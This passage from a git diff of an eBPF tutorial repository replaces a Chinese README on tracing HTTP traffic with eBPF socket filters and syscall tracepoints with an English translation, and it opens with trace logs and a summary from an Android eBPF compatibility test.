0xd28ebb0182dd92990f02000aeb6f2270 18446631020099513920 194649313 45635 12 2 1 2 53902 443 ksoftirqd/0 -07:47:00 0x400700020000bb01000000000f02000a 0xbb01000000000f02000a26f6e878 18446631020132433920 195193350 0 3305 7 2 2 0 443 NetworkService -07:47:00 0x40020002ba32bb01e0e09e3a0f02000a 0xba32bb01e0e09e3a0f02000a26f6e878 18446631020132433920 195206992 13642 0 2 1 2 47666 443 swapper/0 -07:47:00 0x400700020000bb01000000000f02000a 0xbb01000000000f02000ae7e7e8b7 18446631020132448128 195233125 0 3305 7 2 2 0 443 NetworkService -07:47:00 0x40020002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195246569 13444 3305 2 1 2 46248 443 NetworkService -07:47:00 0xf02000affff00000000000000000000 0x1aca06cffff00000000000000000000 18446631019225912320 195383897 0 947 7 2 10 0 80 Thread-11 -07:47:00 0x40010002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195421584 175014 3305 1 4 2 46248 443 NetworkService -07:47:00 0x40040002b4a8bb0136cac8dd0f02000a 0xb4a8bb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195422361 777 3305 4 5 2 46248 443 NetworkService -07:47:00 0x400500020000bb0136cac8dd0f02000a 0xbb0136cac8dd0f02000ae7e7e8b7 18446631020132448128 195422450 88 3305 5 7 2 46248 443 NetworkService -07:47:01 0x400700020000bb01000000000f02000a 0xbb01000000000f02000aea2afb8e 18446631020099528128 196321556 0 1315 7 2 2 0 443 ChromiumNet -``` - -Note: some error messages may appear in the Android shell during the test: - -```console -libbpf: failed to determine tracepoint 'syscalls/sys_enter_open' perf event ID: No such file or directory -libbpf: prog 'tracepoint__syscalls__sys_enter_open': failed to create tracepoint 'syscalls/sys_enter_open' perf event: No such file or directory -libbpf: prog 'tracepoint__syscalls__sys_enter_open': failed to auto-attach: -2 -failed to attach skeleton -Error: BpfError("load and attach ebpf program failed") -``` - -Later, after investigation, it was found that the kernel did not enable the `CONFIG_FTRACE_SYSCALLS` option, which resulted in the inability to use the tracepoint of syscalls. - -## Summary - -The `CONFIG_DEBUG_INFO_BTF` option is enabled by default when viewing the kernel compilation options in the Android shell. Based on this, the examples provided by the eunomia-bpf project already have some successful cases, such as monitoring the execution of the `exec` family of functions and the status of TCP connections. - -For some cases that cannot run, the reasons are mainly the following: - -1. The kernel compilation options do not support the relevant eBPF functionality; -2. The Linux environment packaged by eadb is weak and lacks necessary dependencies; - -Currently, using eBPF tools in the Android system still requires building a complete Linux runtime environment. However, the Android kernel itself has comprehensive support for eBPF. This test proves that higher versions of the Android kernel support BTF debugging information and CO-RE dependent eBPF programs. - -The development of eBPF tools in the Android system requires the addition of official new features. Currently, it seems that using eBPF tools directly through an Android app requires a lot of effort. At the same time, since eBPF tools require root privileges, ordinary Android users will encounter more difficulties in using them. - -If you want to learn more about eBPF knowledge and practice, you can visit our tutorial code repository or website to get more examples and complete tutorials. 
- -## Reference - -+ [Google android docs](https://source.android.google.cn/docs/core/architecture/kernel/bpf) -+ [weixin WeiShu](https://mp.weixin.qq.com/s/mul4n5D3nXThjxuHV7GpMA) -+ [SeeFlowerX](https://blog.seeflower.dev/archives/138/>) - -> The original link of this article: diff --git a/src/23-http/README.md b/src/23-http/README.md index a6d1104..a17c8ed 100644 --- a/src/23-http/README.md +++ b/src/23-http/README.md @@ -1,97 +1,86 @@ -# 通过 eBPF socket filter 或 syscall trace 追踪 HTTP 请求等七层协议 - eBPF 实践教程 +# L7 Tracing with eBPF: HTTP and Beyond via Socket Filters and Syscall Tracepoints -在当今的技术环境中,随着微服务、云原生应用和复杂的分布式系统的崛起,系统的可观测性已成为确保其健康、性能和安全的关键要素。特别是在微服务架构中,应用程序的组件可能分布在多个容器和服务器上,这使得传统的监控方法往往难以提供足够的深度和广度来全面了解系统的行为。这就是为什么观测七层协议,如 HTTP、gRPC、MQTT 等,变得尤为重要。 +In today's technology landscape, with the rise of microservices, cloud-native applications, and complex distributed systems, observability of systems has become a crucial factor in ensuring their health, performance, and security. Especially in a microservices architecture, application components may be distributed across multiple containers and servers, making traditional monitoring methods often insufficient to provide the depth and breadth needed to fully understand the behavior of the system. This is where observing seven-layer protocols such as HTTP, gRPC, MQTT, and more becomes particularly important. -七层协议为我们提供了关于应用程序如何与其他服务和组件交互的详细信息。在微服务环境中,了解这些交互是至关重要的,因为它们经常是性能瓶颈、故障和安全问题的根源。然而,监控这些协议并不简单。传统的网络监控工具,如 tcpdump,虽然在捕获网络流量方面非常有效,但在处理七层协议的复杂性和动态性时,它们往往显得力不从心。 +Seven-layer protocols provide detailed insights into how applications interact with other services and components. In a microservices environment, understanding these interactions is vital, as they often serve as the root causes of performance bottlenecks, failures, and security issues. However, monitoring these protocols is not a straightforward task. Traditional network monitoring tools like tcpdump, while effective at capturing network traffic, often fall short when dealing with the complexity and dynamism of seven-layer protocols. -这正是 eBPF 技术发挥作用的地方。eBPF 允许开发者和运维人员深入到系统的内核层,实时观测和分析系统的行为,而无需对应用程序代码进行任何修改或插入埋点。这为我们提供了一个独特的机会,可以更简单、更高效地处理应用层流量,特别是在微服务环境中。 +This is where eBPF (extended Berkeley Packet Filter) technology comes into play. eBPF allows developers and operators to delve deep into the kernel layer, observing and analyzing system behavior in real-time without the need to modify or insert instrumentation into application code. This presents a unique opportunity to handle application layer traffic more simply and efficiently, particularly in microservices environments. -在本教程中,我们将深入探讨以下内容: +In this tutorial, we will delve into the following: -- 追踪七层协议,如 HTTP,以及与其相关的挑战。 -- eBPF 的 socket filter 和 syscall 追踪:这两种技术如何帮助我们在不同的内核层次追踪 HTTP 网络请求数据,以及这两种方法的优势和局限性。 -- eBPF 实践教程:如何开发一个 eBPF 程序,使用 eBPF socket filter 或 syscall 追踪来捕获和分析 HTTP 流量 +- Tracking seven-layer protocols such as HTTP and the challenges associated with them. +- eBPF's socket filter and syscall tracing: How these two technologies assist in tracing HTTP network request data at different kernel layers, and the advantages and limitations of each. +- eBPF practical tutorial: How to develop an eBPF program and utilize eBPF socket filter or syscall tracing to capture and analyze HTTP traffic. 
-随着网络流量的增加和应用程序的复杂性增加,对七层协议的深入了解变得越来越重要。通过本教程,您将获得必要的知识和工具,以便更有效地监控和分析您的网络流量,从而为您的应用程序和服务器提供最佳的性能。 +As network traffic increases and applications grow in complexity, gaining a deeper understanding of seven-layer protocols becomes increasingly important. Through this tutorial, you will acquire the necessary knowledge and tools to more effectively monitor and analyze your network traffic, ultimately enhancing the performance of your applications and servers. -本文是 eBPF 开发者教程的一部分,更详细的内容可以在这里找到: 源代码在 [GitHub 仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial) 中开源。 +This article is part of the eBPF Developer Tutorial, and for more detailed content, you can visit [here](https://eunomia.dev/tutorials/). The source code is available on the [GitHub repository](https://github.com/eunomia-bpf/bpf-developer-tutorial). -## 追踪 HTTP, HTTP/2 等七层协议的挑战 +## Challenges in Tracking HTTP, HTTP/2, and Other Seven-Layer Protocols -在现代的网络环境中,七层协议不仅仅局限于 HTTP。实际上,有许多七层协议,如 HTTP/2, gRPC, MQTT, WebSocket, AMQP 和 SMTP,它们都在不同的应用场景中发挥着关键作用。这些协议为我们提供了关于应用程序如何与其他服务和组件交互的详细信息。但是,追踪这些协议并不是一个简单的任务,尤其是在复杂的分布式系统中。 +In the modern networking environment, seven-layer protocols extend beyond just HTTP. In fact, there are many seven-layer protocols such as HTTP/2, gRPC, MQTT, WebSocket, AMQP, and SMTP, each serving critical roles in various application scenarios. These protocols provide detailed insights into how applications interact with other services and components. However, tracking these protocols is not a simple task, especially within complex distributed systems. -1. **多样性和复杂性**:每种七层协议都有其特定的设计和工作原理。例如,gRPC 使用了 HTTP/2 作为其传输协议,并支持多种语言。而 MQTT 是为低带宽和不可靠的网络设计的轻量级发布/订阅消息传输协议。 +1. **Diversity and Complexity**: Each seven-layer protocol has its specific design and workings. For example, gRPC utilizes HTTP/2 as its transport protocol and supports multiple languages, while MQTT is a lightweight publish/subscribe messaging transport protocol designed for low-bandwidth and unreliable networks. -2. **动态性**:许多七层协议都是动态的,这意味着它们的行为可能会根据网络条件、应用需求或其他因素而变化。 +2. **Dynamism**: Many seven-layer protocols are dynamic, meaning their behavior can change based on network conditions, application requirements, or other factors. -3. **加密和安全性**:随着安全意识的增强,许多七层协议都采用了加密技术,如 TLS/SSL。这为追踪和分析带来了额外的挑战,因为需要解密流量才能进行深入的分析。 +3. **Encryption and Security**: With increased security awareness, many seven-layer protocols employ encryption technologies such as TLS/SSL. This introduces additional challenges for tracking and analysis, as decrypting traffic is required for in-depth examination. -4. **高性能需求**:在高流量的生产环境中,捕获和分析七层协议的流量可能会对系统性能产生影响。传统的网络监控工具可能无法处理大量的并发会话。 +4. **High-Performance Requirements**: In high-traffic production environments, capturing and analyzing traffic for seven-layer protocols can impact system performance. Traditional network monitoring tools may struggle to handle a large number of concurrent sessions. -5. **数据的完整性和连续性**:与 tcpdump 这样的工具只捕获单独的数据包不同,追踪七层协议需要捕获完整的会话,这可能涉及多个数据包。这要求工具能够正确地重组和解析这些数据包,以提供连续的会话视图。 +5. **Data Completeness and Continuity**: Unlike tools like tcpdump, which capture individual packets, tracking seven-layer protocols requires capturing complete sessions, which may involve multiple packets. This necessitates tools capable of correctly reassembling and parsing these packets to provide a continuous session view. -6. **代码侵入性**:为了深入了解七层协议的行为,开发人员可能需要修改应用程序代码以添加监控功能。这不仅增加了开发和维护的复杂性,而且可能会影响应用程序的性能。 +6. 
**Code Intrusiveness**: To gain deeper insights into the behavior of seven-layer protocols, developers may need to modify application code to add monitoring functionalities. This not only increases development and maintenance complexity but can also impact application performance. -正如上文所述,eBPF 提供了一个强大的解决方案,允许我们在内核层面捕获和分析七层协议的流量,而无需对应用程序进行任何修改。这种方法为我们提供了一个独特的机会,可以更简单、更高效地处理应用层流量,特别是在微服务和分布式环境中。 +As mentioned earlier, eBPF provides a powerful solution, allowing us to capture and analyze seven-layer protocol traffic in the kernel layer without modifying application code. This approach not only offers insights into system behavior but also ensures optimal performance and efficiency. This is why eBPF has become the preferred technology for modern observability tools, especially in production environments that demand high performance and low latency. -在处理网络流量和系统行为时,选择在内核态而非用户态进行处理有其独特的优势。首先,内核态处理可以直接访问系统资源和硬件,从而提供更高的性能和效率。其次,由于内核是操作系统的核心部分,它可以提供对系统行为的全面视图,而不受任何用户空间应用程序的限制。 - -**无插桩追踪("zero-instrumentation observability")**的优势如下: - -1. **性能开销小**:由于不需要修改或添加额外的代码到应用程序中,所以对性能的影响最小化。 -2. **透明性**:开发者和运维人员不需要知道应用程序的内部工作原理,也不需要访问源代码。 -3. **灵活性**:可以轻松地在不同的环境和应用程序中部署和使用,无需进行任何特定的配置或修改。 -4. **安全性**:由于不需要修改应用程序代码,所以降低了引入潜在安全漏洞的风险。 - -利用 eBPF 在内核态进行无插桩追踪,我们可以实时捕获和分析系统的行为,而不需要对应用程序进行任何修改。这种方法不仅提供了对系统深入的洞察力,而且确保了最佳的性能和效率。这是为什么 eBPF 成为现代可观测性工具的首选技术,特别是在需要高性能和低延迟的生产环境中。 - -## eBPF 中的 socket filter 与 syscall 追踪:深入解析与比较 +## eBPF Socket Filter vs. Syscall Tracing: In-Depth Analysis and Comparison ### **eBPF Socket Filter** -**是什么?** -eBPF socket filter 是经典的 Berkeley Packet Filter (BPF) 的扩展,允许在内核中直接进行更高级的数据包过滤。它在套接字层操作,使得可以精细地控制哪些数据包被用户空间应用程序处理。 +**What Is It?** +eBPF socket filter is an extension of the classic Berkeley Packet Filter (BPF) that allows for more advanced packet filtering directly within the kernel. It operates at the socket layer, enabling fine-grained control over which packets are processed by user-space applications. -**主要特点:** +**Key Features:** -- **性能**:通过在内核中直接处理数据包,eBPF socket filters 减少了用户和内核空间之间的上下文切换的开销。 -- **灵活性**:eBPF socket filters 可以附加到任何套接字,为各种协议和套接字类型提供了通用的数据包过滤机制。 -- **可编程性**:开发者可以编写自定义的 eBPF 程序来定义复杂的过滤逻辑,超越简单的数据包匹配。 +- **Performance**: By handling packets directly within the kernel, eBPF socket filters reduce the overhead of context switches between user and kernel spaces. +- **Flexibility**: eBPF socket filters can be attached to any socket, providing a universal packet filtering mechanism for various protocols and socket types. +- **Programmability**: Developers can write custom eBPF programs to define complex filtering logic beyond simple packet matching. -**用途:** +**Use Cases:** -- **流量控制**:根据自定义条件限制或优先处理流量。 -- **安全性**:在它们到达用户空间应用程序之前丢弃恶意数据包。 -- **监控**:捕获特定数据包进行分析,而不影响其它流量。 +- **Traffic Control**: Restrict or prioritize traffic based on custom conditions. +- **Security**: Discard malicious packets before they reach user-space applications. +- **Monitoring**: Capture specific packets for analysis without affecting other traffic. ### **eBPF Syscall Tracing** -**是什么?** -使用 eBPF 进行的系统调用跟踪允许监视和操作应用程序发出的系统调用。系统调用是用户空间应用程序与内核交互的主要机制,因此跟踪它们可以深入了解应用程序的行为。 +**What Is It?** +System call tracing using eBPF allows monitoring and manipulation of system calls made by applications. System calls are the primary mechanism through which user-space applications interact with the kernel, making tracing them a valuable way to understand application behavior. 
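+
+On most distributions you can confirm which syscall hooks exist before writing any code, because every tracepoint is listed in tracefs (mounted at `/sys/kernel/tracing` on newer systems, `/sys/kernel/debug/tracing` on older ones). A quick check for the hooks used later in this tutorial might look like this (listing trimmed; exact names vary by kernel and architecture):
+
+```console
+$ sudo ls /sys/kernel/debug/tracing/events/syscalls/ | grep -E 'accept|read'
+sys_enter_accept
+sys_enter_accept4
+sys_enter_read
+sys_exit_accept
+sys_exit_accept4
+sys_exit_read
+...
+```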
-**主要特点:**
+**Key Features:**

-- **粒度**:eBPF 允许跟踪特定的系统调用,甚至是这些系统调用中的特定参数。
-- **低开销**:与其他跟踪方法相比,eBPF 系统调用跟踪旨在具有最小的性能影响。
-- **安全性**:内核验证 eBPF 程序,以确保它们不会损害系统稳定性。
+- **Granularity**: eBPF allows tracing specific system calls, even specific parameters within those system calls.
+- **Low Overhead**: Compared to other tracing methods, eBPF syscall tracing is designed to have minimal performance impact.
+- **Security**: The kernel validates eBPF programs when they are loaded to ensure they do not compromise system stability.

-**工作原理:**
-eBPF 系统调用跟踪通常涉及将 eBPF 程序附加到与系统调用相关的 tracepoints 或 kprobes。当跟踪的系统调用被调用时,执行 eBPF 程序,允许收集数据或甚至修改系统调用参数。
+**How It Works:**
+eBPF syscall tracing typically involves attaching eBPF programs to tracepoints or kprobes related to the system calls being traced. When the traced system call is invoked, the eBPF program is executed, allowing data collection or even modification of system call parameters.

-### eBPF 的 socket filter 和 syscall 追踪的对比
+### Comparison of eBPF Socket Filter and Syscall Tracing

-| 项目 | eBPF Socket Filter | eBPF Syscall Tracing |
-|------|--------------------|----------------------|
-| **操作层** | 套接字层,主要处理从套接字接收或发送的网络数据包 | 系统调用层,监视和可能更改应用程序发出的系统调用的行为 |
-| **主要用途** | 主要用于网络数据包的过滤、监控和操作 | 用于性能分析、安全监控和系统调用交互的调试 |
-| **粒度** | 专注于单个网络数据包 | 可以监视与网络无关的广泛的系统活动 |
-| **追踪 HTTP 流量** | 可以用于过滤和捕获通过套接字传递的 HTTP 数据包 | 可以跟踪与网络操作相关的系统调用 |
+| Aspect | eBPF Socket Filter | eBPF Syscall Tracing |
+| ------ | ------------------- | --------------------- |
+| **Operational Layer** | Socket layer, primarily dealing with network packets received from or sent to sockets. | System call layer, monitoring and potentially altering the behavior of system calls made by applications. |
+| **Primary Use Cases** | Mainly used for filtering, monitoring, and manipulation of network packets. | Used for performance analysis, security monitoring, and debugging of system call interactions. |
+| **Granularity** | Focuses on individual network packets. | Can monitor a wide range of system activities, including those unrelated to networking. |
+| **Tracking HTTP Traffic** | Can be used to filter and capture HTTP packets passed through sockets. | Can trace system calls associated with networking operations, which may include HTTP traffic. |

-总之,eBPF 的 socket filter 和 syscall 追踪都可以用于追踪 HTTP 流量,但 socket filters 更直接且更适合此目的。然而,如果您对应用程序如何与系统交互的更广泛的上下文感兴趣(例如,哪些系统调用导致了 HTTP 流量),那么系统调用跟踪将是非常有价值的。在许多高级的可观察性设置中,这两种工具可能会同时使用,以提供系统和网络行为的全面视图。
+In summary, both eBPF socket filters and syscall tracing can be used to trace HTTP traffic, but socket filters are more direct and better suited for this purpose. However, if you are interested in the broader context of how an application interacts with the system (e.g., which system calls lead to HTTP traffic), syscall tracing can be highly valuable. In many advanced observability setups, both tools may be used simultaneously to provide a comprehensive view of system and network behavior.

-## 使用 eBPF socket filter 来捕获 HTTP 流量
+## Capturing HTTP Traffic with eBPF Socket Filter

-eBPF 代码由用户态和内核态组成,这里主要关注于内核态代码。这是使用 eBPF socket filter 技术来在内核中捕获HTTP流量的主要逻辑,完整代码如下:
+eBPF code consists of user-space and kernel-space components, and here we primarily focus on the kernel-space code.
Below is the main logic for capturing HTTP traffic in the kernel using eBPF socket filter technology, and the complete code is provided: ```c SEC("socket") @@ -185,7 +174,7 @@ int socket_handler(struct __sk_buff *skb) } ``` -当分析这段eBPF程序时,我们将按照每个代码块的内容来详细解释,并提供相关的背景知识: +When analyzing this eBPF program, we will explain it in detail according to the content of each code block and provide relevant background knowledge: ```c SEC("socket") @@ -195,7 +184,7 @@ int socket_handler(struct __sk_buff *skb) } ``` -这是eBPF程序的入口点,它定义了一个名为 `socket_handler` 的函数,它会被内核用于处理传入的网络数据包。这个函数位于一个名为 `socket` 的 eBPF 节(section)中,表明这个程序用于套接字处理。 +This is the entry point of the eBPF program, defining a function named `socket_handler` that the kernel uses to handle incoming network packets. This function is located in an eBPF section named `socket`, indicating that it is intended for socket handling. ```c struct so_event *e; @@ -210,15 +199,15 @@ __u32 payload_length = 0; __u8 hdr_len; ``` -在这个代码块中,我们定义了一些变量来存储在处理数据包时需要的信息。这些变量包括了`struct so_event *e`用于存储事件信息,`verlen`、`proto`、`nhoff`、`ip_proto`、`tcp_hdr_len`、`tlen`、`payload_offset`、`payload_length`、`hdr_len`等用于存储数据包信息的变量。 +In this code block, several variables are defined to store information needed during packet processing. These variables include `struct so_event *e` for storing event information, `verlen`, `proto`, `nhoff`, `ip_proto`, `tcp_hdr_len`, `tlen`, `payload_offset`, `payload_length`, and `hdr_len` for storing packet information. -- `struct so_event *e;`:这是一个指向`so_event`结构体的指针,用于存储捕获到的事件信息。该结构体的具体定义在程序的其他部分。 -- `__u8 verlen;`、`__u16 proto;`、`__u32 nhoff = ETH_HLEN;`:这些变量用于存储各种信息,例如协议类型、数据包偏移量等。`nhoff`初始化为以太网帧头部的长度,通常为14字节,因为以太网帧头部包括目标MAC地址、源MAC地址和帧类型字段。 -- `__u32 ip_proto = 0;`:这个变量用于存储IP协议的类型,初始化为0。 -- `__u32 tcp_hdr_len = 0;`:这个变量用于存储TCP头部的长度,初始化为0。 -- `__u16 tlen;`:这个变量用于存储IP数据包的总长度。 -- `__u32 payload_offset = 0;`、`__u32 payload_length = 0;`:这两个变量用于存储HTTP请求的载荷(payload)的偏移量和长度。 -- `__u8 hdr_len;`:这个变量用于存储IP头部的长度。 +- `struct so_event *e;`: This is a pointer to the `so_event` structure for storing captured event information. The specific definition of this structure is located elsewhere in the program. +- `__u8 verlen;`, `__u16 proto;`, `__u32 nhoff = ETH_HLEN;`: These variables are used to store various pieces of information, such as protocol types, packet offsets, etc. `nhoff` is initialized to the length of the Ethernet frame header, typically 14 bytes, as Ethernet frame headers include destination MAC address, source MAC address, and frame type fields. +- `__u32 ip_proto = 0;`: This variable is used to store the type of the IP protocol and is initialized to 0. +- `__u32 tcp_hdr_len = 0;`: This variable is used to store the length of the TCP header and is initialized to 0. +- `__u16 tlen;`: This variable is used to store the total length of the IP packet. +- `__u32 payload_offset = 0;`, `__u32 payload_length = 0;`: These two variables are used to store the offset and length of the HTTP request payload. +- `__u8 hdr_len;`: This variable is used to store the length of the IP header. ```c bpf_skb_load_bytes(skb, 12, &proto, 2); @@ -227,20 +216,20 @@ if (proto != ETH_P_IP) return 0; ``` -在这里,代码从数据包中加载了以太网帧的类型字段,这个字段告诉我们数据包使用的网络层协议。然后,使用`__bpf_ntohs`函数将网络字节序的类型字段转换为主机字节序。接下来,代码检查类型字段是否等于IPv4的以太网帧类型(0x0800)。如果不等于,说明这个数据包不是IPv4数据包,直接返回0,放弃处理。 +Here, the code loads the Ethernet frame type field from the packet, which tells us the network layer protocol being used in the packet. 
It then uses the `__bpf_ntohs` function to convert the network byte order type field into host byte order. Next, the code checks if the type field is not equal to the Ethernet frame type for IPv4 (0x0800). If it's not equal, it means the packet is not an IPv4 packet, and the function returns 0, indicating that the packet should not be processed. -这里需要了解以下几个概念: +Key concepts to understand here: -- 以太网帧(Ethernet Frame):是数据链路层(第二层)的协议,用于在局域网中传输数据帧。以太网帧通常包括目标MAC地址、源MAC地址和帧类型字段。 -- 网络字节序(Network Byte Order):网络协议通常使用大端字节序(Big-Endian)来表示数据。因此,需要将从网络中接收到的数据转换为主机字节序,以便在主机上正确解释数据。 -- IPv4帧类型(ETH_P_IP):表示以太网帧中包含的协议类型字段,0x0800表示IPv4。 +- Ethernet Frame: The Ethernet frame is a data link layer (Layer 2) protocol used for transmitting data frames within a local area network (LAN). Ethernet frames typically include destination MAC address, source MAC address, and frame type fields. +- Network Byte Order: Network protocols often use big-endian byte order to represent data. Therefore, data received from the network needs to be converted into host byte order for proper interpretation on the host. Here, the type field from the network is converted to host byte order for further processing. +- IPv4 Frame Type (ETH_P_IP): This represents the frame type field in the Ethernet frame, where 0x0800 indicates IPv4. ```c if (ip_is_fragment(skb, nhoff)) return 0; ``` -这一部分的代码检查是否处理IP分片。IP分片是将较大的IP数据包分割成多个小片段以进行传输的机制。在这里,如果数据包是IP分片,则直接返回0,表示不处理分片,只处理完整的数据包。 +This part of the code checks if IP fragmentation is being handled. IP fragmentation is a mechanism for splitting larger IP packets into multiple smaller fragments for transmission. Here, if the packet is an IP fragment, the function returns 0, indicating that only complete packets will be processed. ```c static inline int ip_is_fragment(struct __sk_buff *skb, __u32 nhoff) @@ -253,31 +242,33 @@ static inline int ip_is_fragment(struct __sk_buff *skb, __u32 nhoff) } ``` -上述代码是一个辅助函数,用于检查传入的IPv4数据包是否为IP分片。IP分片是一种机制,当IP数据包的大小超过了网络的最大传输单元(MTU),路由器会将其分割成多个较小的片段,以便在网络上进行传输。这个函数的目的是检查数据包的分片标志(Fragmentation Flag)以及片偏移(Fragment Offset)字段,以确定是否为分片。 +The above code is a helper function used to check if the incoming IPv4 packet is an IP fragment. IP fragmentation is a mechanism where, if the size of an IP packet exceeds the Maximum Transmission Unit (MTU) of the network, routers split it into smaller fragments for transmission across the network. The purpose of this function is to examine the fragment flags and fragment offset fields within the packet to determine if it is a fragment. -下面是代码的逐行解释: +Here's an explanation of the code line by line: -1. `__u16 frag_off;`:定义一个16位无符号整数变量`frag_off`,用于存储片偏移字段的值。 -2. `bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, frag_off), &frag_off, 2);`:这行代码使用`bpf_skb_load_bytes`函数从数据包中加载IPv4头部的片偏移字段(`frag_off`),并加载2个字节。`nhoff`是IPv4头部在数据包中的偏移量,`offsetof(struct iphdr, frag_off)`用于计算片偏移字段在IPv4头部中的偏移量。 -3. `frag_off = __bpf_ntohs(frag_off);`:将加载的片偏移字段从网络字节序(Big-Endian)转换为主机字节序。网络协议通常使用大端字节序表示数据,而主机可能使用大端或小端字节序。这里将片偏移字段转换为主机字节序,以便进一步处理。 -4. `return frag_off & (IP_MF | IP_OFFSET);`:这行代码通过使用位运算检查片偏移字段的值,以确定是否为IP分片。具体来说,它使用位与运算符`&`将片偏移字段与两个标志位进行位与运算: - - `IP_MF`:表示"更多分片"标志(More Fragments)。如果这个标志位被设置为1,表示数据包是分片的一部分,还有更多分片。 - - `IP_OFFSET`:表示片偏移字段。如果片偏移字段不为0,表示数据包是分片的一部分,且具有片偏移值。 - 如果这两个标志位中的任何一个被设置为1,那么结果就不为零,说明数据包是IP分片。如果都为零,说明数据包不是分片。 +1. `__u16 frag_off;`: Defines a 16-bit unsigned integer variable `frag_off` to store the fragment offset field. +2. 
`bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, frag_off), &frag_off, 2);`: This line uses the `bpf_skb_load_bytes` function to load two bytes, the fragment offset field, from the packet. `nhoff` is the offset of the IP header within the packet, and `offsetof(struct iphdr, frag_off)` calculates the offset of the fragment offset field within the IPv4 header.
+3. `frag_off = __bpf_ntohs(frag_off);`: Converts the loaded fragment offset field from network byte order (big-endian) to host byte order. Network protocols typically use big-endian to represent data, and the conversion to host byte order is done for further processing.
+4. `return frag_off & (IP_MF | IP_OFFSET);`: This line checks the value of the fragment offset field using a bitwise AND with two flag masks (in the kernel headers, `IP_MF` is 0x2000 and `IP_OFFSET` is 0x1FFF):
+   - `IP_MF`: Represents the "More Fragments" flag. If this flag is set to 1, it indicates that the packet is part of a fragmented sequence and more fragments are expected.
+   - `IP_OFFSET`: Represents the fragment offset field. If the fragment offset field is non-zero, it indicates that the packet is part of a fragmented sequence and has a fragment offset value.
+   If either of these is non-zero, the result of the AND is non-zero and the packet is an IP fragment; if both are zero, the packet is not fragmented.

-需要注意的是,IP头部的片偏移字段以8字节为单位,所以实际的片偏移值需要左移3位来得到字节偏移。此外,IP头部的"更多分片"标志(IP_MF)表示数据包是否有更多的分片,通常与片偏移字段一起使用来指示整个数据包的分片情况。这个函数只关心这两个标志位,如果其中一个标志被设置,就认为是IP分片。
+It's important to note that the fragment offset field in the IP header is specified in units of 8 bytes, so the actual byte offset is obtained by left-shifting the value by 3 bits. Additionally, the "More Fragments" flag (IP_MF) indicates whether more fragments follow and is typically used together with the fragment offset field to describe how the whole packet was fragmented. This function only cares about these two bits and treats the packet as a fragment if either is set.

 ```c
 bpf_skb_load_bytes(skb, ETH_HLEN, &hdr_len, sizeof(hdr_len));
 hdr_len &= 0x0f;
 hdr_len *= 4;
 ```

-这一部分的代码从数据包中加载IP头部的长度字段。IP头部长度字段包含了IP头部的长度信息,以4字节为单位,需要将其转换为字节数。这里通过按位与和乘以4来进行转换。
+This part of the code loads the first byte of the IP header. Its low four bits hold the header length (IHL) in units of 4 bytes, so the code masks them out with `& 0x0f` and multiplies by 4 to obtain a byte count. For example, a typical first header byte of 0x45 yields an IHL of 5, that is, a 5 * 4 = 20 byte header.

-需要了解:
+Key concept:

-- IP头部(IP Header):IP头部包含了关于数据包的基本信息,如源IP地址、目标IP地址、协议类型和头部校验和等。头部长度字段(IHL,Header Length)表示IP头部的长度,以4字节为单位,通常为20字节(5个4字节的字)。
+- IP Header: The IP header contains fundamental information about a packet, such as the source IP address, destination IP address, protocol type, and header checksum. The header length field (IHL, Header Length) expresses the header length in units of 4 bytes and is typically 20 bytes (five 4-byte words).

 ```c
 if (hdr_len < sizeof(struct iphdr))
@@ -286,13 +277,11 @@ if (hdr_len < sizeof(struct iphdr))
 }
 ```

-这段代码检查IP头部的长度是否满足最小长度要求,通常IP头部的最小长度是20字节。如果IP头部的长度小于20字节,说明数据包不完整或损坏,直接返回0,放弃处理。
+This code segment checks that the IP header meets the minimum length requirement of 20 bytes. If the header is shorter than that, the packet is incomplete or corrupted, and the function returns 0 so the packet is not processed.
-需要了解:
+Key concept:

-- `struct iphdr`:这是Linux内核中定义的结构体,表示IPv4头部的格式。它包括了版本、头部长度、服务类型、总长度、
-
-标识符、标志位、片偏移、生存时间、协议、头部校验和、源IP地址和目标IP地址等字段。
+- `struct iphdr`: This is a structure defined in the Linux kernel, representing the format of an IPv4 header. It includes fields such as version, header length, service type, total length, identification, flags, fragment offset, time to live, protocol, header checksum, source IP address, and destination IP address, among others.

 ```c
 bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, protocol), &ip_proto, 1);
@@ -302,29 +291,29 @@ if (ip_proto != IPPROTO_TCP)
 }
 ```

-在这里,代码从数据包中加载IP头部中的协议字段,以确定数据包使用的传输层协议。然后,它检查协议字段是否为TCP协议(IPPROTO_TCP)。如果不是TCP协议,说明不是HTTP请求或响应,直接返回0。
+Here, the code loads the protocol field from the IP header to determine the transport layer protocol used in the packet. It then checks whether that protocol is TCP (IPPROTO_TCP); if it is not, the packet cannot be an HTTP request or response, and the function returns 0.

-需要了解:
+Key concept:

-- 传输层协议:IP头部中的协议字段指示了数据包所使用的传输层协议,例如TCP、UDP或ICMP。
+- Transport Layer Protocol: The protocol field in the IP header indicates the transport layer protocol used in the packet, such as TCP, UDP, or ICMP.

 ```c
 tcp_hdr_len = nhoff + hdr_len;
 ```

-这行代码计算了TCP头部的偏移量。它将以太网帧头部的长度(`nhoff`)与IP头部的长度(`hdr_len`)相加,得到TCP头部的起始位置。
+This line of code calculates the offset of the TCP header. It adds the length of the Ethernet frame header (`nhoff`) to the length of the IP header (`hdr_len`) to obtain the starting position of the TCP header.

 ```c
 bpf_skb_load_bytes(skb, nhoff + 0, &verlen, 1);
 ```

-这行代码从数据包中加载TCP头部的第一个字节,该字节包含了TCP头部长度信息。这个长度字段以4字节为单位,需要进行后续的转换。
+Despite where it sits in the flow, this line loads the first byte of the IP header (at offset `nhoff + 0`), not of the TCP header: that byte packs the IP version and the header length (IHL), expressed in units of 4 bytes. The value stored in `verlen` is not used further in this snippet; the TCP header length is instead derived from the data offset field below.

 ```c
 bpf_skb_load_bytes(skb, nhoff + offsetof(struct iphdr, tot_len), &tlen, sizeof(tlen));
 ```

-这行代码从数据包中加载IP头部的总长度字段。IP头部总长度字段表示整个IP数据包的长度,包括IP头部和数据部分。
+This line of code loads the total length field of the IP header from the packet. The total length field represents the overall length of the IP packet, including both the IP header and the data portion.

 ```c
 __u8 doff;
@@ -334,22 +323,22 @@ doff >>= 4;
 doff *= 4;
 ```

